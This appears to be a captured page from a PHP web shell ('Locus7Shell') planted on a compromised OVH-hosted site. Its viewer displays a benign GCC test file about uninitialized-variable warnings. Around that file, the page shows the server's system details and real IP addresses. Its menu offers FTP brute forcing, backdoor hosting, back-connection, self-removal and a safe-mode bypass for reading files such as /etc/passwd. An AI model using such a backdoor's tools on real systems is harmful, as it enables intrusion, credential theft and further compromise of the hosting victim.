Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     uninit-34.c (1.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR middle-end/10138 - warn for uninitialized arrays passed as const*
   arguments
   Verify that passing pointers to uninitialized objects to arguments
   to functions declared with attribute access is diagnosed where expected.
   { dg-do compile }
   { dg-options "-O -Wall" } */

#define RW(...) __attribute__ ((access (read_write, __VA_ARGS__)))

RW (1) RW (3) void
f4pi (int*, int*, int*, int*);    // { dg-message "in a call to 'f4pi' declared with attribute 'access \\\(read_write, \[13\]\\\)'" }


void nowarn_scalar (void)
{
  int i1 = 0, i2, i3 = 1, i4;
  f4pi (&i1, &i2, &i3, &i4);
}

void warn_scalar_1 (void)
{
  int i1;                         // { dg-message "declared here" }
  int i2, i3 = 1, i4;

  f4pi (&i1, &i2, &i3, &i4);      // { dg-warning "'i1' may be used uninitialized" }
}

void warn_scalar_2 (void)
{
  int j1 = 0, j2, j4;
  int j3;

  f4pi (&j1, &j2, &j3, &j4);      // { dg-warning "'j3' may be used uninitialized" }
}


void nowarn_array_init (void)
{
  int a1[4] = { 0 }, a2[5], a3[6] = { 0 }, a4[7];

  f4pi (a1, a2, a3, a4);
}

void warn_array_1 (void)
{
  int a1[4];                  // { dg-message "'a1' declared here" }
  int a2[5], a3[6] = { 0 }, a4[7];

  f4pi (a1, a2, a3, a4);      // { dg-warning "'a1' may be used uninitialized" }
}

void warn_array_2 (void)
{
  int a1[4] = { 0 }, a2[5], a4[7];
  int a3[6];                  // { dg-message "'a3' declared here" }

  f4pi (a1, a2, a3, a4);      // { dg-warning "'a3' may be used uninitialized" }
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0054 ]--